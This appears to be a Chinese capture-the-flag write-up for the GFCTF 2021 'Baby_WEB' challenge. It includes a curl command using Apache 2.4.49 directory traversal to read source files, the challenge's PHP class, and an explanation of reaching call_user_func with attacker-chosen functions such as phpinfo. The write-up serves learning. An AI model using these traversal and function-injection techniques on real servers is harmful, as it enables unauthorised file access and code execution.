[GFCTF 2021] day2

Baby_WEB

查看源码发现

然后抓包看中间件，Apache/2.4.49 (Unix) 存在目录穿越漏洞

curl Http://node4.anna.nssctf.cn:28805/cgi-bin/.%2e/.%2e/.%2e/.%2e/var/www/index        .PHP.txt

index.php

display($_GET['filename']);?>

继续读取Class.php

'1.0','img'=>'https://www.apache.org/img/asf-estd-1999-logo.jpg'];    private $template;    public function __construct($data){        $this->date = array_merge($this->date,$data);    }    public function getTempName($template,$dir){        if($dir === 'admin'){            $this->template = str_replace('..','','./template/admin/'.$template);            if(!is_file($this->template)){                die("no!!");            }        }        else{            $this->template = './template/index.html';        }    }    public function display($template,$space=''){        extract($this->date);        $this->getTempName($template,$space);        include($this->template);    }    public function listdata($_params){        $system = [            'db' => '',            'app' => '',            'num' => '',            'sum' => '',            'form' => '',            'page' => '',            'site' => '',            'flag' => '',            'not_flag' => '',            'show_flag' => '',            'more' => '',            'catid' => '',            'field' => '',            'order' => '',            'space' => '',            'table' => '',            'table_site' => '',            'total' => '',            'join' => '',            'on' => '',            'action' => '',            'return' => '',            'sbpage' => '',            'module' => '',            'urlrule' => '',            'pagesize' => '',            'pagefile' => '',        ];        $param = $where = [];        $_params = trim($_params);        $params = explode(' ', $_params);        if (in_array($params[0], ['list','function'])) {            $params[0] = 'action='.$params[0];        }        foreach ($params as $t) {            $var = substr($t, 0, strpos($t, '='));            $val = substr($t, strpos($t, '=') + 1);            if (!$var) {                continue;            }            if (isset($system[$var])) {                 $system[$var] = $val;            } else {                $param[$var] = $val;             }        }        // action        switch ($system['action']) {            case 'function':                if (!isset($param['name'])) {                    return  'hacker!!';                } elseif (!function_exists($param['name'])) {                    return 'hacker!!';                }                $force = $param['force'];                if (!$force) {                    $p = [];                    foreach ($param as $var => $t) {                        if (strpos($var, 'param') === 0) {$n = intval(substr($var, 5));$p[$n] = $t;                        }                    }                    if ($p) {                        $rt = call_user_func_array($param['name'], $p);                    } else {                        $rt = call_user_func($param['name']);                    }                    return $rt;                }else{                    return null;                }            case 'list':                return json_encode($this->date);        }        return null;    }}

/template/admin/ 首先代码中有这一个目录，访问看一下是啥

 发现会调用listdata方法并且需要我们传参  action module

 if($dir === 'admin'){
            $this->template = str_replace('..','','./template/admin/'.$template);

template需要就是传进去index.html,这样才会调用listdata这个方法

$dir需要是admin,是space传进来的，所以space=admin

template也就是filename需要是 index.html

action需要是function

module也就是mod 赋值

force存在随便赋值就行

$force = $param['force'];
                if (!$force) {

利用call_user_func显示环境变量。

 这里action=function name=phpinfo是因为数组是以空格为分隔的。

方法二、利用call_user_func_array

$rt = call_user_func_array($param['name'], $p);

则需要满足 $p存在也就是，

foreach ($param as $var => $t) {    if (strpos($var, 'param') === 0) {        $n = intval(substr($var, 5));        $p[$n] = $t ;    }

在这里需要一个键和值，

结束！ 

来源地址：https://blog.csdn.net/qq_62046696/article/details/130546143